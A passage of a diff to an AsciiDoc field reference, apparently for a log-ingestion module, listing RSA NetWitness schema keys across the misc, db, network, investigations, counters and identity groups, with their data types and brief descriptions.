keyword + +-- + +*`rsa.misc.cn_min_ttl`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_minpcktlen`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_1`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_10`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_2`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_3`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_4`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_5`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_6`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_7`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_8`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_9`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mplstoplabel`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mplstoplabip`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mul_dst_byt`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mul_dst_pks`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_muligmptype`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_sampalgo`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_sampint`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_seqctr`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_spackets`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_src_tos`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_src_vlan`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_sysuptime`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_template_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_totbytsexp`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_totflowexp`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_totpcktsexp`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_unixnanosecs`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_v6flowlabel`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_v6optheaders`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.comp_class`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.comp_name`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.comp_rbytes`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.comp_sbytes`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cpu_data`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.criticality`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_agency_dst`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_analyzedby`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_av_other`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_av_primary`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_av_secondary`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_bgpv6nxthop`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_bit9status`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_context`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_control`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_data`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_datecret`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_dst_tld`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_eth_dst_ven`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_eth_src_ven`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_event_uuid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_filetype`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_fld`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_if_desc`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_if_name`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_ip_next_hop`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_ipv4dstpre`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_ipv4srcpre`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_lifetime`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_log_medium`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_loginname`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_modulescore`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_modulesign`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_opswatresult`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_payload`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_registrant`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_registrar`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_represult`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_rpayload`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_sampler_name`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_sourcemodule`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_streams`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_targetmodule`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_v6nxthop`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_whois_server`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_yararesult`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.description`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.devvendor`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.distance`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.dstburb`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.edomain`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.edomaub`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.euid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.facility`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.finterface`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.flags`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.gaddr`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.id3`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.im_buddyname`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.im_croomid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.im_croomtype`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.im_members`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.im_username`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.ipkt`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.ipscat`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.ipspri`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.latitude`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.linenum`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.list_name`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.load_data`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.location_floor`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.location_mark`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.log_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.log_type`*:: ++ +-- +type: keyword + +-- +*`rsa.misc.logid`*:: ++ +-- type: keyword -- -*`rsa.misc.library`*:: +*`rsa.misc.logip`*:: + -- -This key is used to capture library information in mainframe devices - type: keyword -- -*`rsa.misc.parent_node`*:: +*`rsa.misc.logname`*:: + -- -This key captures the Parent Node Name. Must be related to node variable. - type: keyword -- -*`rsa.misc.risk_info`*:: +*`rsa.misc.longitude`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.tcp_flags`*:: +*`rsa.misc.lport`*:: + -- -This key is captures the TCP flags set in any packet of session - -type: long +type: keyword -- -*`rsa.misc.tos`*:: +*`rsa.misc.mbug_data`*:: + -- -This key describes the type of service - -type: long +type: keyword -- -*`rsa.misc.vm_target`*:: +*`rsa.misc.misc_name`*:: + -- -VMWare Target **VMWARE** only varaible. - type: keyword -- -*`rsa.misc.workspace`*:: +*`rsa.misc.msg_type`*:: + -- -This key captures Workspace Description - type: keyword -- -*`rsa.misc.command`*:: +*`rsa.misc.msgid`*:: + -- type: keyword -- -*`rsa.misc.event_category`*:: +*`rsa.misc.netsessid`*:: + -- type: keyword -- -*`rsa.misc.facilityname`*:: +*`rsa.misc.num`*:: + -- type: keyword -- -*`rsa.misc.forensic_info`*:: +*`rsa.misc.number1`*:: + -- type: keyword -- -*`rsa.misc.jobname`*:: +*`rsa.misc.number2`*:: + -- type: keyword -- -*`rsa.misc.mode`*:: +*`rsa.misc.nwwn`*:: + -- type: keyword -- -*`rsa.misc.policy`*:: +*`rsa.misc.object`*:: + -- type: keyword -- -*`rsa.misc.policy_waiver`*:: +*`rsa.misc.operation`*:: + -- type: keyword -- -*`rsa.misc.second`*:: +*`rsa.misc.opkt`*:: + -- type: keyword -- -*`rsa.misc.space1`*:: +*`rsa.misc.orig_from`*:: + -- type: keyword -- -*`rsa.misc.subcategory`*:: +*`rsa.misc.owner_id`*:: + -- type: keyword -- -*`rsa.misc.tbdstr2`*:: +*`rsa.misc.p_action`*:: + -- type: keyword -- -*`rsa.misc.alert_id`*:: +*`rsa.misc.p_filter`*:: + -- -Deprecated, New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.checksum_dst`*:: +*`rsa.misc.p_group_object`*:: + -- -This key is used to capture the checksum or hash of the the target entity such as a process or file. - type: keyword -- -*`rsa.misc.checksum_src`*:: +*`rsa.misc.p_id`*:: + -- -This key is used to capture the checksum or hash of the source entity such as a file or process. - type: keyword -- -*`rsa.misc.fresult`*:: +*`rsa.misc.p_msgid1`*:: + -- -This key captures the Filter Result - -type: long +type: keyword -- -*`rsa.misc.payload_dst`*:: +*`rsa.misc.p_msgid2`*:: + -- -This key is used to capture destination payload - type: keyword -- -*`rsa.misc.payload_src`*:: +*`rsa.misc.p_result1`*:: + -- -This key is used to capture source payload - type: keyword -- -*`rsa.misc.pool_id`*:: +*`rsa.misc.password_chg`*:: + -- -This key captures the identifier (typically numeric field) of a resource pool - type: keyword -- -*`rsa.misc.process_id_val`*:: +*`rsa.misc.password_expire`*:: + -- -This key is a failure key for Process ID when it is not an integer value - type: keyword -- -*`rsa.misc.risk_num_comm`*:: +*`rsa.misc.permgranted`*:: + -- -This key captures Risk Number Community - -type: double +type: keyword -- -*`rsa.misc.risk_num_next`*:: +*`rsa.misc.permwanted`*:: + -- -This key captures Risk Number NextGen - -type: double +type: keyword -- -*`rsa.misc.risk_num_sand`*:: +*`rsa.misc.pgid`*:: + -- -This key captures Risk Number SandBox - -type: double +type: keyword -- -*`rsa.misc.risk_num_static`*:: +*`rsa.misc.policyUUID`*:: + -- -This key captures Risk Number Static - -type: double +type: keyword -- -*`rsa.misc.risk_suspicious`*:: +*`rsa.misc.prog_asp_num`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.risk_warning`*:: +*`rsa.misc.program`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.snmp_oid`*:: +*`rsa.misc.real_data`*:: + -- -SNMP Object Identifier - type: keyword -- -*`rsa.misc.sql`*:: +*`rsa.misc.rec_asp_device`*:: + -- -This key captures the SQL query - type: keyword -- -*`rsa.misc.vuln_ref`*:: +*`rsa.misc.rec_asp_num`*:: + -- -This key captures the Vulnerability Reference details - type: keyword -- -*`rsa.misc.acl_id`*:: +*`rsa.misc.rec_library`*:: + -- type: keyword -- -*`rsa.misc.acl_op`*:: +*`rsa.misc.recordnum`*:: + -- type: keyword -- -*`rsa.misc.acl_pos`*:: +*`rsa.misc.ruid`*:: + -- type: keyword -- -*`rsa.misc.acl_table`*:: +*`rsa.misc.sburb`*:: + -- type: keyword -- -*`rsa.misc.admin`*:: +*`rsa.misc.sdomain_fld`*:: + -- type: keyword -- -*`rsa.misc.alarm_id`*:: +*`rsa.misc.sec`*:: + -- type: keyword -- -*`rsa.misc.alarmname`*:: +*`rsa.misc.sensorname`*:: + -- type: keyword -- -*`rsa.misc.app_id`*:: +*`rsa.misc.seqnum`*:: + -- type: keyword -- -*`rsa.misc.audit`*:: +*`rsa.misc.session`*:: + -- type: keyword -- -*`rsa.misc.audit_object`*:: +*`rsa.misc.sessiontype`*:: + -- type: keyword -- -*`rsa.misc.auditdata`*:: +*`rsa.misc.sigUUID`*:: + -- type: keyword -- -*`rsa.misc.benchmark`*:: +*`rsa.misc.spi`*:: + -- type: keyword -- -*`rsa.misc.bypass`*:: +*`rsa.misc.srcburb`*:: + -- type: keyword -- -*`rsa.misc.cache`*:: +*`rsa.misc.srcdom`*:: + -- type: keyword -- -*`rsa.misc.cache_hit`*:: +*`rsa.misc.srcservice`*:: + -- type: keyword -- -*`rsa.misc.cefversion`*:: +*`rsa.misc.state`*:: + -- type: keyword -- -*`rsa.misc.cfg_attr`*:: +*`rsa.misc.status1`*:: + -- type: keyword -- -*`rsa.misc.cfg_obj`*:: +*`rsa.misc.svcno`*:: + -- type: keyword -- -*`rsa.misc.cfg_path`*:: +*`rsa.misc.system`*:: + -- type: keyword -- -*`rsa.misc.changes`*:: +*`rsa.misc.tbdstr1`*:: + -- type: keyword -- -*`rsa.misc.client_ip`*:: +*`rsa.misc.tgtdom`*:: + -- type: keyword -- -*`rsa.misc.clustermembers`*:: +*`rsa.misc.tgtdomain`*:: + -- type: keyword -- -*`rsa.misc.cn_acttimeout`*:: +*`rsa.misc.threshold`*:: + -- type: keyword -- -*`rsa.misc.cn_asn_src`*:: +*`rsa.misc.type1`*:: + -- type: keyword -- -*`rsa.misc.cn_bgpv4nxthop`*:: +*`rsa.misc.udb_class`*:: + -- type: keyword -- -*`rsa.misc.cn_ctr_dst_code`*:: +*`rsa.misc.url_fld`*:: + -- type: keyword -- -*`rsa.misc.cn_dst_tos`*:: +*`rsa.misc.user_div`*:: + -- type: keyword -- -*`rsa.misc.cn_dst_vlan`*:: +*`rsa.misc.userid`*:: + -- type: keyword -- -*`rsa.misc.cn_engine_id`*:: +*`rsa.misc.username_fld`*:: + -- type: keyword -- -*`rsa.misc.cn_engine_type`*:: +*`rsa.misc.utcstamp`*:: + -- type: keyword -- -*`rsa.misc.cn_f_switch`*:: +*`rsa.misc.v_instafname`*:: + -- type: keyword -- -*`rsa.misc.cn_flowsampid`*:: +*`rsa.misc.virt_data`*:: + -- type: keyword -- -*`rsa.misc.cn_flowsampintv`*:: +*`rsa.misc.vpnid`*:: + -- type: keyword -- -*`rsa.misc.cn_flowsampmode`*:: +*`rsa.misc.autorun_type`*:: + -- +This is used to capture Auto Run type + type: keyword -- -*`rsa.misc.cn_inacttimeout`*:: +*`rsa.misc.cc_number`*:: + -- -type: keyword +Valid Credit Card Numbers only + +type: long -- -*`rsa.misc.cn_inpermbyts`*:: +*`rsa.misc.content`*:: + -- +This key captures the content type from protocol headers + type: keyword -- -*`rsa.misc.cn_inpermpckts`*:: +*`rsa.misc.ein_number`*:: + -- -type: keyword +Employee Identification Numbers only + +type: long -- -*`rsa.misc.cn_invalid`*:: +*`rsa.misc.found`*:: + -- +This is used to capture the results of regex match + type: keyword -- -*`rsa.misc.cn_ip_proto_ver`*:: +*`rsa.misc.language`*:: + -- +This is used to capture list of languages the client support and what it prefers + type: keyword -- -*`rsa.misc.cn_ipv4_ident`*:: +*`rsa.misc.lifetime`*:: + -- -type: keyword +This key is used to capture the session lifetime in seconds. + +type: long -- -*`rsa.misc.cn_l_switch`*:: +*`rsa.misc.link`*:: + -- +This key is used to link the sessions together. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.misc.cn_log_did`*:: +*`rsa.misc.match`*:: + -- +This key is for regex match name from search.ini + type: keyword -- -*`rsa.misc.cn_log_rid`*:: +*`rsa.misc.param_dst`*:: + -- +This key captures the command line/launch argument of the target process or file + type: keyword -- -*`rsa.misc.cn_max_ttl`*:: +*`rsa.misc.param_src`*:: + -- +This key captures source parameter + type: keyword -- -*`rsa.misc.cn_maxpcktlen`*:: +*`rsa.misc.search_text`*:: + -- +This key captures the Search Text used + type: keyword -- -*`rsa.misc.cn_min_ttl`*:: +*`rsa.misc.sig_name`*:: + -- +This key is used to capture the Signature Name only. + type: keyword -- -*`rsa.misc.cn_minpcktlen`*:: +*`rsa.misc.snmp_value`*:: + -- +SNMP set request value + type: keyword -- -*`rsa.misc.cn_mpls_lbl_1`*:: +*`rsa.misc.streams`*:: + -- -type: keyword +This key captures number of streams in session + +type: long -- -*`rsa.misc.cn_mpls_lbl_10`*:: + +*`rsa.db.index`*:: + -- +This key captures IndexID of the index. + type: keyword -- -*`rsa.misc.cn_mpls_lbl_2`*:: +*`rsa.db.instance`*:: + -- +This key is used to capture the database server instance name + type: keyword -- -*`rsa.misc.cn_mpls_lbl_3`*:: +*`rsa.db.database`*:: + -- +This key is used to capture the name of a database or an instance as seen in a session + type: keyword -- -*`rsa.misc.cn_mpls_lbl_4`*:: +*`rsa.db.transact_id`*:: + -- +This key captures the SQL transantion ID of the current session + type: keyword -- -*`rsa.misc.cn_mpls_lbl_5`*:: +*`rsa.db.permissions`*:: + -- +This key captures permission or privilege level assigned to a resource. + type: keyword -- -*`rsa.misc.cn_mpls_lbl_6`*:: +*`rsa.db.table_name`*:: + -- +This key is used to capture the table name + type: keyword -- -*`rsa.misc.cn_mpls_lbl_7`*:: +*`rsa.db.db_id`*:: + -- +This key is used to capture the unique identifier for a database + type: keyword -- -*`rsa.misc.cn_mpls_lbl_8`*:: +*`rsa.db.db_pid`*:: + -- -type: keyword +This key captures the process id of a connection with database server + +type: long -- -*`rsa.misc.cn_mpls_lbl_9`*:: +*`rsa.db.lread`*:: + -- -type: keyword +This key is used for the number of logical reads + +type: long -- -*`rsa.misc.cn_mplstoplabel`*:: +*`rsa.db.lwrite`*:: ++ +-- +This key is used for the number of logical writes + +type: long + +-- + +*`rsa.db.pread`*:: ++ +-- +This key is used for the number of physical writes + +type: long + +-- + + +*`rsa.network.alias_host`*:: + -- +This key should be used when the source or destination context of a hostname is not clear.Also it captures the Device Hostname. Any Hostname that isnt ad.computer. + type: keyword -- -*`rsa.misc.cn_mplstoplabip`*:: +*`rsa.network.domain`*:: + -- type: keyword -- -*`rsa.misc.cn_mul_dst_byt`*:: +*`rsa.network.host_dst`*:: + -- +This key should only be used when it’s a Destination Hostname + type: keyword -- -*`rsa.misc.cn_mul_dst_pks`*:: +*`rsa.network.network_service`*:: + -- +This is used to capture layer 7 protocols/service names + type: keyword -- -*`rsa.misc.cn_muligmptype`*:: +*`rsa.network.interface`*:: + -- +This key should be used when the source or destination context of an interface is not clear + type: keyword -- -*`rsa.misc.cn_sampalgo`*:: +*`rsa.network.network_port`*:: ++ +-- +Deprecated, use port. NOTE: There is a type discrepancy as currently used, TM: Int32, INDEX: UInt64 (why neither chose the correct UInt16?!) + +type: long + +-- + +*`rsa.network.eth_host`*:: + -- +Deprecated, use alias.mac + type: keyword -- -*`rsa.misc.cn_sampint`*:: +*`rsa.network.sinterface`*:: + -- +This key should only be used when it’s a Source Interface + type: keyword -- -*`rsa.misc.cn_seqctr`*:: +*`rsa.network.dinterface`*:: + -- +This key should only be used when it’s a Destination Interface + type: keyword -- -*`rsa.misc.cn_spackets`*:: +*`rsa.network.vlan`*:: ++ +-- +This key should only be used to capture the ID of the Virtual LAN + +type: long + +-- + +*`rsa.network.zone_src`*:: + -- +This key should only be used when it’s a Source Zone. + type: keyword -- -*`rsa.misc.cn_src_tos`*:: +*`rsa.network.zone`*:: + -- +This key should be used when the source or destination context of a Zone is not clear + type: keyword -- -*`rsa.misc.cn_src_vlan`*:: +*`rsa.network.zone_dst`*:: + -- +This key should only be used when it’s a Destination Zone. + type: keyword -- -*`rsa.misc.cn_sysuptime`*:: +*`rsa.network.gateway`*:: + -- +This key is used to capture the IP Address of the gateway + type: keyword -- -*`rsa.misc.cn_template_id`*:: +*`rsa.network.icmp_type`*:: ++ +-- +This key is used to capture the ICMP type only + +type: long + +-- + +*`rsa.network.mask`*:: + -- +This key is used to capture the device network IPmask. + type: keyword -- -*`rsa.misc.cn_totbytsexp`*:: +*`rsa.network.icmp_code`*:: ++ +-- +This key is used to capture the ICMP code only + +type: long + +-- + +*`rsa.network.protocol_detail`*:: + -- +This key should be used to capture additional protocol information + type: keyword -- -*`rsa.misc.cn_totflowexp`*:: +*`rsa.network.dmask`*:: + -- +This key is used for Destionation Device network mask + type: keyword -- -*`rsa.misc.cn_totpcktsexp`*:: +*`rsa.network.port`*:: ++ +-- +This key should only be used to capture a Network Port when the directionality is not clear + +type: long + +-- + +*`rsa.network.smask`*:: + -- +This key is used for capturing source Network Mask + type: keyword -- -*`rsa.misc.cn_unixnanosecs`*:: +*`rsa.network.netname`*:: + -- +This key is used to capture the network name associated with an IP range. This is configured by the end user. + type: keyword -- -*`rsa.misc.cn_v6flowlabel`*:: +*`rsa.network.paddr`*:: ++ +-- +Deprecated + +type: ip + +-- + +*`rsa.network.faddr`*:: + -- type: keyword -- -*`rsa.misc.cn_v6optheaders`*:: +*`rsa.network.lhost`*:: + -- type: keyword -- -*`rsa.misc.comp_class`*:: +*`rsa.network.origin`*:: + -- type: keyword -- -*`rsa.misc.comp_name`*:: +*`rsa.network.remote_domain_id`*:: + -- type: keyword -- -*`rsa.misc.comp_rbytes`*:: +*`rsa.network.addr`*:: + -- type: keyword -- -*`rsa.misc.comp_sbytes`*:: +*`rsa.network.dns_a_record`*:: + -- type: keyword -- -*`rsa.misc.cpu_data`*:: +*`rsa.network.dns_ptr_record`*:: + -- type: keyword -- -*`rsa.misc.criticality`*:: +*`rsa.network.fhost`*:: + -- type: keyword -- -*`rsa.misc.cs_agency_dst`*:: +*`rsa.network.fport`*:: + -- type: keyword -- -*`rsa.misc.cs_analyzedby`*:: +*`rsa.network.laddr`*:: + -- type: keyword -- -*`rsa.misc.cs_av_other`*:: +*`rsa.network.linterface`*:: + -- type: keyword -- -*`rsa.misc.cs_av_primary`*:: +*`rsa.network.phost`*:: + -- type: keyword -- -*`rsa.misc.cs_av_secondary`*:: +*`rsa.network.ad_computer_dst`*:: + -- +Deprecated, use host.dst + type: keyword -- -*`rsa.misc.cs_bgpv6nxthop`*:: +*`rsa.network.eth_type`*:: ++ +-- +This key is used to capture Ethernet Type, Used for Layer 3 Protocols Only + +type: long + +-- + +*`rsa.network.ip_proto`*:: ++ +-- +This key should be used to capture the Protocol number, all the protocol nubers are converted into string in UI + +type: long + +-- + +*`rsa.network.dns_cname_record`*:: + -- type: keyword -- -*`rsa.misc.cs_bit9status`*:: +*`rsa.network.dns_id`*:: + -- type: keyword -- -*`rsa.misc.cs_context`*:: +*`rsa.network.dns_opcode`*:: + -- type: keyword -- -*`rsa.misc.cs_control`*:: +*`rsa.network.dns_resp`*:: + -- type: keyword -- -*`rsa.misc.cs_data`*:: +*`rsa.network.dns_type`*:: + -- type: keyword -- -*`rsa.misc.cs_datecret`*:: +*`rsa.network.domain1`*:: + -- type: keyword -- -*`rsa.misc.cs_dst_tld`*:: +*`rsa.network.host_type`*:: + -- type: keyword -- -*`rsa.misc.cs_eth_dst_ven`*:: +*`rsa.network.packet_length`*:: + -- type: keyword -- -*`rsa.misc.cs_eth_src_ven`*:: +*`rsa.network.host_orig`*:: + -- +This is used to capture the original hostname in case of a Forwarding Agent or a Proxy in between. + type: keyword -- -*`rsa.misc.cs_event_uuid`*:: +*`rsa.network.rpayload`*:: + -- +This key is used to capture the total number of payload bytes seen in the retransmitted packets. + type: keyword -- -*`rsa.misc.cs_filetype`*:: +*`rsa.network.vlan_name`*:: + -- +This key should only be used to capture the name of the Virtual LAN + type: keyword -- -*`rsa.misc.cs_fld`*:: + +*`rsa.investigations.ec_activity`*:: + -- +This key captures the particular event activity(Ex:Logoff) + type: keyword -- -*`rsa.misc.cs_if_desc`*:: +*`rsa.investigations.ec_theme`*:: + -- +This key captures the Theme of a particular Event(Ex:Authentication) + type: keyword -- -*`rsa.misc.cs_if_name`*:: +*`rsa.investigations.ec_subject`*:: + -- +This key captures the Subject of a particular Event(Ex:User) + type: keyword -- -*`rsa.misc.cs_ip_next_hop`*:: +*`rsa.investigations.ec_outcome`*:: + -- +This key captures the outcome of a particular Event(Ex:Success) + type: keyword -- -*`rsa.misc.cs_ipv4dstpre`*:: +*`rsa.investigations.event_cat`*:: ++ +-- +This key captures the Event category number + +type: long + +-- + +*`rsa.investigations.event_cat_name`*:: + -- +This key captures the event category name corresponding to the event cat code + type: keyword -- -*`rsa.misc.cs_ipv4srcpre`*:: +*`rsa.investigations.event_vcat`*:: + -- +This is a vendor supplied category. This should be used in situations where the vendor has adopted their own event_category taxonomy. + type: keyword -- -*`rsa.misc.cs_lifetime`*:: +*`rsa.investigations.analysis_file`*:: + -- +This is used to capture all indicators used in a File Analysis. This key should be used to capture an analysis of a file + type: keyword -- -*`rsa.misc.cs_log_medium`*:: +*`rsa.investigations.analysis_service`*:: + -- +This is used to capture all indicators used in a Service Analysis. This key should be used to capture an analysis of a service + type: keyword -- -*`rsa.misc.cs_loginname`*:: +*`rsa.investigations.analysis_session`*:: + -- +This is used to capture all indicators used for a Session Analysis. This key should be used to capture an analysis of a session + type: keyword -- -*`rsa.misc.cs_modulescore`*:: +*`rsa.investigations.boc`*:: + -- +This is used to capture behaviour of compromise + type: keyword -- -*`rsa.misc.cs_modulesign`*:: +*`rsa.investigations.eoc`*:: + -- +This is used to capture Enablers of Compromise + type: keyword -- -*`rsa.misc.cs_opswatresult`*:: +*`rsa.investigations.inv_category`*:: + -- +This used to capture investigation category + type: keyword -- -*`rsa.misc.cs_payload`*:: +*`rsa.investigations.inv_context`*:: + -- +This used to capture investigation context + type: keyword -- -*`rsa.misc.cs_registrant`*:: +*`rsa.investigations.ioc`*:: + -- +This is key capture indicator of compromise + type: keyword -- -*`rsa.misc.cs_registrar`*:: + +*`rsa.counters.dclass_c1`*:: ++ +-- +This is a generic counter key that should be used with the label dclass.c1.str only + +type: long + +-- + +*`rsa.counters.dclass_c2`*:: ++ +-- +This is a generic counter key that should be used with the label dclass.c2.str only + +type: long + +-- + +*`rsa.counters.event_counter`*:: ++ +-- +This is used to capture the number of times an event repeated + +type: long + +-- + +*`rsa.counters.dclass_r1`*:: + -- +This is a generic ratio key that should be used with the label dclass.r1.str only + type: keyword -- -*`rsa.misc.cs_represult`*:: +*`rsa.counters.dclass_c3`*:: ++ +-- +This is a generic counter key that should be used with the label dclass.c3.str only + +type: long + +-- + +*`rsa.counters.dclass_c1_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c1 only + type: keyword -- -*`rsa.misc.cs_rpayload`*:: +*`rsa.counters.dclass_c2_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c2 only + type: keyword -- -*`rsa.misc.cs_sampler_name`*:: +*`rsa.counters.dclass_r1_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r1 only + type: keyword -- -*`rsa.misc.cs_sourcemodule`*:: +*`rsa.counters.dclass_r2`*:: + -- +This is a generic ratio key that should be used with the label dclass.r2.str only + type: keyword -- -*`rsa.misc.cs_streams`*:: +*`rsa.counters.dclass_c3_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c3 only + type: keyword -- -*`rsa.misc.cs_targetmodule`*:: +*`rsa.counters.dclass_r3`*:: + -- +This is a generic ratio key that should be used with the label dclass.r3.str only + type: keyword -- -*`rsa.misc.cs_v6nxthop`*:: +*`rsa.counters.dclass_r2_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r2 only + type: keyword -- -*`rsa.misc.cs_whois_server`*:: +*`rsa.counters.dclass_r3_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r3 only + type: keyword -- -*`rsa.misc.cs_yararesult`*:: + +*`rsa.identity.auth_method`*:: + -- +This key is used to capture authentication methods used only + type: keyword -- -*`rsa.misc.description`*:: +*`rsa.identity.user_role`*:: + -- +This key is used to capture the Role of a user only + type: keyword -- -*`rsa.misc.devvendor`*:: +*`rsa.identity.dn`*:: + -- +X.500 (LDAP) Distinguished Name + type: keyword -- -*`rsa.misc.distance`*:: +*`rsa.identity.logon_type`*:: + -- +This key is used to capture the type of logon method used. + type: keyword -- -*`rsa.misc.dstburb`*:: +*`rsa.identity.profile`*:: + -- +This key is used to capture the user profile + type: keyword -- -*`rsa.misc.edomain`*:: +*`rsa.identity.accesses`*:: + -- +This key is used to capture actual privileges used in accessing an object + type: keyword -- -*`rsa.misc.edomaub`*:: +*`rsa.identity.realm`*:: + -- +Radius realm or similar grouping of accounts + type: keyword -- -*`rsa.misc.euid`*:: +*`rsa.identity.user_sid_dst`*:: + -- +This key captures Destination User Session ID + type: keyword -- -*`rsa.misc.facility`*:: +*`rsa.identity.dn_src`*:: + -- +An X.500 (LDAP) Distinguished name that is used in a context that indicates a Source dn + type: keyword -- 